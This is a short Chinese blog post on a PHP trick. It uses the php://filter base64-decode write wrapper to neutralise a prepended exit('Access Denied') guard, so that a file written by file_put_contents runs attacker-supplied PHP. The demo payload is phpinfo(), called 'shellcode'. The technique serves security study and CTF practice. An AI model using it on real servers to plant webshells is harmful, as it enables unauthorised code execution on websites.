绕过 <?PHP exit('Access Denied'); ?> 限制

 
<?php
$shellcode='PD9waHBpbmZvKCk7Pz4';//   base64_decode <?phpinfo();?>
$endstr='s';
 
$timestamp=$endstr.$shellcode;
file_put_contents("php://filter/write=convert.base64-decode/resource=ryat.php","<?PHP exit('Access Denied'); ?>\t$timestamp");
 
?>
 
利用base64产生乱码可以生成:
 
<s奁+@q乾? 鏩<?phpinfo();?>
 
就绕过了exit()限制,真厉害呀

相关文章:

  • 2022-03-02
  • 2021-07-19
  • 2021-12-30
  • 2021-10-28
  • 2021-07-15
  • 2021-10-29
  • 2021-10-28
猜你喜欢
  • 2022-12-23
  • 2021-12-04
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-09-28
  • 2021-09-25
相关资源
相似解决方案